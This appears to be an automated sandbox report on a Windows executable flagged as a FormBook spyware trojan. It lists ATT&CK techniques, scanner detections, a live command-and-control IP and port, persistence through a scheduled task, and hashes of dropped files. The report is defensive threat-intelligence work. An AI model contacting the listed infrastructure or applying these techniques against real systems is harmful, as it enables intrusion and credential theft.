                    Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise
                    Execution: Windows Management Instrumentation (221); Scheduled Task/Job (1); At; Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job
                    Persistence: Scheduled Task/Job (1); DLL Side-Loading (1); Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job
                    Privilege Escalation: Process Injection (111); Scheduled Task/Job (1); DLL Side-Loading (1); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job
                    Defense Evasion: Masquerading (11); Disable or Modify Tools (11); Virtualization/Sandbox Evasion (241); Process Injection (111); Obfuscated Files or Information (3); Software Packing (12); Timestomp (1); DLL Side-Loading (1)
                    Credential Access: OS Credential Dumping (1); LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem
                    Discovery: Query Registry (1); Security Software Discovery (331); Process Discovery (1); Virtualization/Sandbox Evasion (241); Application Window Discovery (1); File and Directory Discovery (1); System Information Discovery (113); System Owner/User Discovery
                    Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services
                    Collection: Archive Collected Data (1); Data from Local System (3); Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking
                    Command and Control: Encrypted Channel (1); Non-Standard Port (11); Non-Application Layer Protocol (2); Application Layer Protocol (12); Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol
                    Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol
                    Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement

                    [Behavior graph: ID 1532739; Sample: PZNfhfaj9O.exe; Startdate: 13/10/2024; Architecture: WINDOWS; Score: 100]

                    Source | Detection | Scanner | Label | Link
                    PZNfhfaj9O.exe | 61% | ReversingLabs | ByteCode-MSIL.Backdoor.FormBook |
                    PZNfhfaj9O.exe | 100% | Joe Sandbox ML | |

                    Source | Detection | Scanner | Label | Link
                    C:\Users\user\AppData\Roaming\CiENBY.exe | 61% | ReversingLabs | ByteCode-MSIL.Backdoor.FormBook |
                    No Antivirus matches
                    No Antivirus matches
                    Name | IP | Active | Malicious | Antivirus Detection | Reputation
                    api.ip.sb | unknown | unknown | true | | unknown

                    Name | Malicious | Antivirus Detection | Reputation
                    185.222.58.80:55615 | true | | unknown
                    http://185.222.58.80:55615/ | true | | unknown
                          NameSourceMaliciousAntivirus DetectionReputation
                                              unknown
                                              https://api.ipify.orgcookies//settinString.RemovegPZNfhfaj9O.exe, PZNfhfaj9O.exe, 00000009.00000002.1973035327.0000000000402000.00000040.00000400.00020000.00000000.sdmp, CiENBY.exe, 0000000B.00000002.1959789817.0000000003EDB000.00000004.00000800.00020000.00000000.sdmptrue
                                                unknown
                                                https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchCiENBY.exe, 00000012.00000002.2087050965.0000000003983000.00000004.00000800.00020000.00000000.sdmp, CiENBY.exe, 00000012.00000002.2087050965.00000000039DA000.00000004.00000800.00020000.00000000.sdmp, tmpDF76.tmp.18.dr, tmpA7F8.tmp.18.dr, tmpA787.tmp.18.dr, tmp92A9.tmp.9.dr, tmp9255.tmp.9.dr, tmp9298.tmp.9.dr, tmpA798.tmp.18.dr, tmpC7C5.tmp.9.dr, tmpDFB8.tmp.18.dr, tmp9277.tmp.9.dr, tmp92B9.tmp.9.dr, tmpC7B5.tmp.9.dr, tmpDF86.tmp.18.dr, tmp5CCD.tmp.9.dr, tmpA7D8.tmp.18.dr, tmp9266.tmp.9.dr, tmpDF97.tmp.18.dr, tmpC7D6.tmp.9.dr, tmp9287.tmp.9.drfalse
                                                • URL Reputation: safe
                                                unknown
                                                http://www.galapagosdesign.com/DPleasePZNfhfaj9O.exe, 00000000.00000002.1869321281.0000000006F82000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • URL Reputation: safe
                                                unknown
                                                http://tempuri.org/Endpoint/VerifyUpdatePZNfhfaj9O.exe, 00000009.00000002.1975298411.0000000002F91000.00000004.00000800.00020000.00000000.sdmp, CiENBY.exe, 00000012.00000002.2081500546.0000000002841000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  unknown
                                                  http://tempuri.org/0PZNfhfaj9O.exe, 00000009.00000002.1975298411.0000000002F91000.00000004.00000800.00020000.00000000.sdmp, CiENBY.exe, 00000012.00000002.2081500546.0000000002841000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    unknown
                                                    http://185.222.58.80:55615PZNfhfaj9O.exe, 00000009.00000002.1975298411.0000000003110000.00000004.00000800.00020000.00000000.sdmp, PZNfhfaj9O.exe, 00000009.00000002.1975298411.0000000002F91000.00000004.00000800.00020000.00000000.sdmp, CiENBY.exe, 00000012.00000002.2081500546.0000000002841000.00000004.00000800.00020000.00000000.sdmp, CiENBY.exe, 00000012.00000002.2081500546.000000000296E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      unknown
                                                      http://www.fonts.comPZNfhfaj9O.exe, 00000000.00000002.1869321281.0000000006F82000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      • URL Reputation: safe
                                                      unknown
                                                      http://www.sandoll.co.krPZNfhfaj9O.exe, 00000000.00000002.1869321281.0000000006F82000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      • URL Reputation: safe
                                                      unknown
                                                      http://www.urwpp.deDPleasePZNfhfaj9O.exe, 00000000.00000002.1869321281.0000000006F82000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      • URL Reputation: safe
                                                      unknown
                                                      http://www.zhongyicts.com.cnPZNfhfaj9O.exe, 00000000.00000002.1869321281.0000000006F82000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      • URL Reputation: safe
                                                      unknown
                                                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namePZNfhfaj9O.exe, 00000000.00000002.1865981717.0000000002D51000.00000004.00000800.00020000.00000000.sdmp, PZNfhfaj9O.exe, 00000009.00000002.1975298411.0000000002F91000.00000004.00000800.00020000.00000000.sdmp, CiENBY.exe, 0000000B.00000002.1958380307.0000000002E01000.00000004.00000800.00020000.00000000.sdmp, CiENBY.exe, 00000012.00000002.2081500546.0000000002841000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      • URL Reputation: safe
                                                      unknown
                                                      http://www.sakkal.comPZNfhfaj9O.exe, 00000000.00000002.1869321281.0000000006F82000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      • URL Reputation: safe
                                                      unknown
                                                      https://ipinfo.io/ip%appdata%PZNfhfaj9O.exe, PZNfhfaj9O.exe, 00000009.00000002.1973035327.0000000000402000.00000040.00000400.00020000.00000000.sdmp, CiENBY.exe, 0000000B.00000002.1959789817.0000000003EDB000.00000004.00000800.00020000.00000000.sdmptrue
                                                        unknown
                                                        http://www.apache.org/licenses/LICENSE-2.0PZNfhfaj9O.exe, 00000000.00000002.1869321281.0000000006F82000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          unknown
                                                          http://www.fontbureau.comPZNfhfaj9O.exe, 00000000.00000002.1869321281.0000000006F82000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          • URL Reputation: safe
                                                          unknown
                                                          https://www.google.com/images/branding/product/ico/googleg_lodp.icoCiENBY.exe, 00000012.00000002.2087050965.00000000039DA000.00000004.00000800.00020000.00000000.sdmp, tmpDF76.tmp.18.dr, tmpA7F8.tmp.18.dr, tmpA787.tmp.18.dr, tmp92A9.tmp.9.dr, tmp9255.tmp.9.dr, tmp9298.tmp.9.dr, tmpA798.tmp.18.dr, tmpC7C5.tmp.9.dr, tmpDFB8.tmp.18.dr, tmp9277.tmp.9.dr, tmp92B9.tmp.9.dr, tmpC7B5.tmp.9.dr, tmpDF86.tmp.18.dr, tmp5CCD.tmp.9.dr, tmpA7D8.tmp.18.dr, tmp9266.tmp.9.dr, tmpDF97.tmp.18.dr, tmpC7D6.tmp.9.dr, tmp9287.tmp.9.dr, tmpC7E7.tmp.9.drfalse
                                                            unknown
                                                            http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymousPZNfhfaj9O.exe, 00000009.00000002.1975298411.0000000002F91000.00000004.00000800.00020000.00000000.sdmp, CiENBY.exe, 00000012.00000002.2081500546.0000000002841000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            • URL Reputation: safe
                                                            unknown
                                                            http://tempuri.org/Endpoint/CheckConnectResponsePZNfhfaj9O.exe, 00000009.00000002.1975298411.0000000002F91000.00000004.00000800.00020000.00000000.sdmp, CiENBY.exe, 00000012.00000002.2081500546.0000000002841000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              unknown
                                                              http://schemas.datacontract.org/2004/07/PZNfhfaj9O.exe, 00000009.00000002.1975298411.00000000030BC000.00000004.00000800.00020000.00000000.sdmp, CiENBY.exe, 00000012.00000002.2081500546.000000000296E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                unknown
                                                                https://api.ip.sb/geoip%USERPEnvironmentROFILE%PZNfhfaj9O.exe, PZNfhfaj9O.exe, 00000009.00000002.1973035327.0000000000402000.00000040.00000400.00020000.00000000.sdmp, CiENBY.exe, 0000000B.00000002.1959789817.0000000003EDB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  unknown
                                                                  https://api.ip.sbPZNfhfaj9O.exe, 00000009.00000002.1975298411.0000000002FE0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    unknown
                                                                    https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=CiENBY.exe, 00000012.00000002.2087050965.00000000039DA000.00000004.00000800.00020000.00000000.sdmp, tmpDF76.tmp.18.dr, tmpA7F8.tmp.18.dr, tmpA787.tmp.18.dr, tmp92A9.tmp.9.dr, tmp9255.tmp.9.dr, tmp9298.tmp.9.dr, tmpA798.tmp.18.dr, tmpC7C5.tmp.9.dr, tmpDFB8.tmp.18.dr, tmp9277.tmp.9.dr, tmp92B9.tmp.9.dr, tmpC7B5.tmp.9.dr, tmpDF86.tmp.18.dr, tmp5CCD.tmp.9.dr, tmpA7D8.tmp.18.dr, tmp9266.tmp.9.dr, tmpDF97.tmp.18.dr, tmpC7D6.tmp.9.dr, tmp9287.tmp.9.dr, tmpC7E7.tmp.9.drfalse
                                                                    • URL Reputation: safe
                                                                    unknown
                                                                    http://tempuri.org/Endpoint/CheckConnectPZNfhfaj9O.exe, 00000009.00000002.1975298411.0000000002F91000.00000004.00000800.00020000.00000000.sdmp, CiENBY.exe, 00000012.00000002.2081500546.0000000002841000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      unknown
                                                                      https://www.ecosia.org/newtab/CiENBY.exe, 00000012.00000002.2087050965.0000000003983000.00000004.00000800.00020000.00000000.sdmp, CiENBY.exe, 00000012.00000002.2087050965.00000000039DA000.00000004.00000800.00020000.00000000.sdmp, tmpDF76.tmp.18.dr, tmpA7F8.tmp.18.dr, tmpA787.tmp.18.dr, tmp92A9.tmp.9.dr, tmp9255.tmp.9.dr, tmp9298.tmp.9.dr, tmpA798.tmp.18.dr, tmpC7C5.tmp.9.dr, tmpDFB8.tmp.18.dr, tmp9277.tmp.9.dr, tmp92B9.tmp.9.dr, tmpC7B5.tmp.9.dr, tmpDF86.tmp.18.dr, tmp5CCD.tmp.9.dr, tmpA7D8.tmp.18.dr, tmp9266.tmp.9.dr, tmpDF97.tmp.18.dr, tmpC7D6.tmp.9.dr, tmp9287.tmp.9.drfalse
                                                                      • URL Reputation: safe
                                                                      unknown
                                                                      https://www.chiark.greenend.org.uk/~sgtatham/putty/0PZNfhfaj9O.exe, CiENBY.exe.0.drfalse
                                                                      • URL Reputation: safe
                                                                      unknown
                                                                      http://tempuri.org/Endpoint/SetEnvironPZNfhfaj9O.exe, 00000009.00000002.1975298411.000000000315A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        unknown
                                                                        http://www.carterandcone.comlPZNfhfaj9O.exe, 00000000.00000002.1869321281.0000000006F82000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        • URL Reputation: safe
                                                                        unknown
                                                                        https://ac.ecosia.org/autocomplete?q=CiENBY.exe, 00000012.00000002.2087050965.0000000003983000.00000004.00000800.00020000.00000000.sdmp, CiENBY.exe, 00000012.00000002.2087050965.00000000039DA000.00000004.00000800.00020000.00000000.sdmp, tmpDF76.tmp.18.dr, tmpA7F8.tmp.18.dr, tmpA787.tmp.18.dr, tmp92A9.tmp.9.dr, tmp9255.tmp.9.dr, tmp9298.tmp.9.dr, tmpA798.tmp.18.dr, tmpC7C5.tmp.9.dr, tmpDFB8.tmp.18.dr, tmp9277.tmp.9.dr, tmp92B9.tmp.9.dr, tmpC7B5.tmp.9.dr, tmpDF86.tmp.18.dr, tmp5CCD.tmp.9.dr, tmpA7D8.tmp.18.dr, tmp9266.tmp.9.dr, tmpDF97.tmp.18.dr, tmpC7D6.tmp.9.dr, tmp9287.tmp.9.drfalse
                                                                        • URL Reputation: safe
                                                                        unknown
                                                                        http://www.fontbureau.com/designers/cabarga.htmlNPZNfhfaj9O.exe, 00000000.00000002.1869321281.0000000006F82000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        • URL Reputation: safe
                                                                        unknown
                                                                        http://www.founder.com.cn/cnPZNfhfaj9O.exe, 00000000.00000002.1869321281.0000000006F82000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        • URL Reputation: safe
                                                                        unknown
                                                                        http://www.fontbureau.com/designers/frere-user.htmlPZNfhfaj9O.exe, 00000000.00000002.1869321281.0000000006F82000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        • URL Reputation: safe
                                                                        unknown
                                                                        http://schemas.xmlsoap.org/ws/2004/08/addressingPZNfhfaj9O.exe, 00000009.00000002.1975298411.0000000002F91000.00000004.00000800.00020000.00000000.sdmp, CiENBY.exe, 00000012.00000002.2081500546.0000000002841000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        • URL Reputation: safe
                                                                        unknown
                                                                        http://tempuri.org/Endpoint/GetUpdatesResponsePZNfhfaj9O.exe, 00000009.00000002.1975298411.0000000002F91000.00000004.00000800.00020000.00000000.sdmp, CiENBY.exe, 00000012.00000002.2081500546.0000000002841000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          unknown
                                                                          http://www.jiyu-kobo.co.jp/PZNfhfaj9O.exe, 00000000.00000002.1869321281.0000000006F82000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          • URL Reputation: safe
                                                                          unknown
                                                                          http://tempuri.org/Endpoint/EnvironmentSettingsResponsePZNfhfaj9O.exe, 00000009.00000002.1975298411.0000000002F91000.00000004.00000800.00020000.00000000.sdmp, CiENBY.exe, 00000012.00000002.2081500546.0000000002841000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            unknown
                                                                            http://www.fontbureau.com/designers8PZNfhfaj9O.exe, 00000000.00000002.1869321281.0000000006F82000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            • URL Reputation: safe
                                                                            unknown
                                                                            https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=CiENBY.exe, 00000012.00000002.2087050965.0000000003983000.00000004.00000800.00020000.00000000.sdmp, CiENBY.exe, 00000012.00000002.2087050965.00000000039DA000.00000004.00000800.00020000.00000000.sdmp, tmpDF76.tmp.18.dr, tmpA7F8.tmp.18.dr, tmpA787.tmp.18.dr, tmp92A9.tmp.9.dr, tmp9255.tmp.9.dr, tmp9298.tmp.9.dr, tmpA798.tmp.18.dr, tmpC7C5.tmp.9.dr, tmpDFB8.tmp.18.dr, tmp9277.tmp.9.dr, tmp92B9.tmp.9.dr, tmpC7B5.tmp.9.dr, tmpDF86.tmp.18.dr, tmp5CCD.tmp.9.dr, tmpA7D8.tmp.18.dr, tmp9266.tmp.9.dr, tmpDF97.tmp.18.dr, tmpC7D6.tmp.9.dr, tmp9287.tmp.9.drfalse
                                                                            • URL Reputation: safe
                                                                            unknown
                                                                            http://ns.adobe.0/xmpDeCiENBY.exe, 00000012.00000002.2079877792.0000000000CFE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              unknown
                                                                              http://schemas.xmlsoap.org/soap/actor/nextPZNfhfaj9O.exe, 00000009.00000002.1975298411.0000000002F91000.00000004.00000800.00020000.00000000.sdmp, CiENBY.exe, 00000012.00000002.2081500546.0000000002841000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              • URL Reputation: safe
                                                                              unknown
IP:185.222.58.80
Domain:unknown
Country:Netherlands
ASN:51447
ASN Name:ROOTLAYERNETNL
Malicious:true
                                                                              Joe Sandbox version:41.0.0 Charoite
                                                                              Analysis ID:1532739
                                                                              Start date and time:2024-10-13 21:01:07 +02:00
                                                                              Joe Sandbox product:CloudBasic
                                                                              Overall analysis duration:0h 8m 16s
                                                                              Hypervisor based Inspection enabled:false
                                                                              Report type:full
                                                                              Cookbook file name:default.jbs
                                                                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                              Number of analysed new started processes analysed:21
                                                                              Number of new started drivers analysed:0
                                                                              Number of existing processes analysed:0
                                                                              Number of existing drivers analysed:0
                                                                              Number of injected processes analysed:0
                                                                              Technologies:
                                                                              • HCA enabled
                                                                              • EGA enabled
                                                                              • AMSI enabled
                                                                              Analysis Mode:default
                                                                              Analysis stop reason:Timeout
                                                                              Sample name:PZNfhfaj9O.exe
                                                                              renamed because original name is a hash value
                                                                              Original Sample Name:01d452e81b85a3d399a247852f2f5004.exe
                                                                              Detection:MAL
                                                                              Classification:mal100.troj.spyw.evad.winEXE@23/99@2/1
                                                                              EGA Information:
                                                                              • Successful, ratio: 100%
                                                                              HCA Information:
                                                                              • Successful, ratio: 100%
                                                                              • Number of executed functions: 103
                                                                              • Number of non-executed functions: 12
                                                                              Cookbook Comments:
                                                                              • Found application associated with file extension: .exe
                                                                              • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                                              • Excluded IPs from analysis (whitelisted): 172.67.75.172, 104.26.13.31, 104.26.12.31
                                                                              • Excluded domains from analysis (whitelisted): api.ip.sb.cdn.cloudflare.net, fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed, report is missing behavior information
                                                                              • Report size exceeded maximum capacity and may have missing behavior information.
                                                                              • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                              • Report size getting too big, too many NtCreateKey calls found.
                                                                              • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                              • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                              • Report size getting too big, too many NtQueryValueKey calls found.
                                                                              • VT rate limit hit for: PZNfhfaj9O.exe
Time | Type | Description
15:02:08 | API Interceptor | 40x Sleep call for process: PZNfhfaj9O.exe modified
15:02:15 | API Interceptor | 37x Sleep call for process: powershell.exe modified
15:02:18 | API Interceptor | 42x Sleep call for process: CiENBY.exe modified
20:02:15 | Task Scheduler | Run new task: CiENBY path: C:\Users\user\AppData\Roaming\CiENBY.exe
Match:ROOTLAYERNETNL
Associated Sample Name / URL | Detection | Threat Name | Context
ZxS8mP8uE6.exe | malicious | RedLine | 45.137.22.123
nu28HwzQwC.exe | malicious | RedLine | 185.222.58.52
DKO6uy1Tia.exe | malicious | RedLine | 45.137.22.70
3BOCQ22aUs.ps1 | malicious | Unknown | 45.137.20.45
Order Proposal.exe | malicious | RedLine | 45.137.22.121
l2rMtmFkD6.exe | malicious | RedLine | 185.222.58.233
HJEbEB40vP.exe | malicious | GuLoader | 185.222.58.113
PzPxqbK89H.exe | malicious | RedLine | 45.137.22.239
tfF3UBTdr8.exe | malicious | RedLine | 185.222.57.91
4Si6dGqcuy.exe | malicious | RedLine | 45.137.22.102
                                                                              Process:C:\Users\user\AppData\Roaming\CiENBY.exe
                                                                              File Type:ASCII text, with CRLF line terminators
                                                                              Category:dropped
                                                                              Size (bytes):1216
                                                                              Entropy (8bit):5.34331486778365
                                                                              Encrypted:false
                                                                              SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                                                              MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                                                              SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                                                              SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                                                              SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                                                              Malicious:false
                                                                              Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02
                                                                              Process:C:\Users\user\Desktop\PZNfhfaj9O.exe
                                                                              File Type:ASCII text, with CRLF line terminators
                                                                              Category:dropped
                                                                              Size (bytes):1216
                                                                              Entropy (8bit):5.34331486778365
                                                                              Encrypted:false
                                                                              SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                                                              MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                                                              SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                                                              SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                                                              SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                                                              Malicious:true
                                                                              Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02
                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):2232
                                                                              Entropy (8bit):5.379401388151058
                                                                              Encrypted:false
                                                                              SSDEEP:48:fWSU4xymI4RfoUeW+gZ9tK8NPZHUxL7u1iMuge//ZPUyuVws:fLHxvIIwLgZ2KRHWLOugbVws
                                                                              MD5:0B4017F125E76F55EAE85EF01D615C8A
                                                                              SHA1:74D2FF2E01213220AD36EEF8CA5CD4FC54DFB23F
                                                                              SHA-256:13EED02E4D9B3CE0C1B223961DEAFB6D1AE7D91878397420DE1916D4F779925C
                                                                              SHA-512:BD7E1EDFB02BCA3A7DB412A8DA17D15F99C6B51F400F8EE195DD45DF9DEB49874CF94160A31BBF08ACC570AEC9973EC568797E00701833521D0C696111DCDFFA
                                                                              Malicious:false
                                                                              Preview:@...e................................................@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<...............i..VdqF...|...........System.Configuration4.................%...K... ...........System.Xml..L.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.H................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com
                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                              File Type:ASCII text, with no line terminators
                                                                              Category:dropped
                                                                              Size (bytes):60
                                                                              Entropy (8bit):4.038920595031593
                                                                              Encrypted:false
                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                              Malicious:false
                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                              Process:C:\Users\user\AppData\Roaming\CiENBY.exe
                                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                              Category:dropped
                                                                              Size (bytes):106496
                                                                              Entropy (8bit):1.1358696453229276
                                                                              Encrypted:false
                                                                              SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                              MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                              SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                              SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                              SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                              Malicious:false
                                                                              Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                              Process:C:\Users\user\AppData\Roaming\CiENBY.exe
                                                                              File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                              Category:dropped
                                                                              Size (bytes):49152
                                                                              Entropy (8bit):0.8180424350137764
                                                                              Encrypted:false
                                                                              SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                              MD5:349E6EB110E34A08924D92F6B334801D
                                                                              SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                              SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                              SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                              Malicious:false
                                                                              Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                              Process:C:\Users\user\AppData\Roaming\CiENBY.exe
                                                                              File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                              Category:dropped
                                                                              Size (bytes):114688
                                                                              Entropy (8bit):0.9746603542602881
                                                                              Encrypted:false
                                                                              SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                              MD5:780853CDDEAEE8DE70F28A4B255A600B
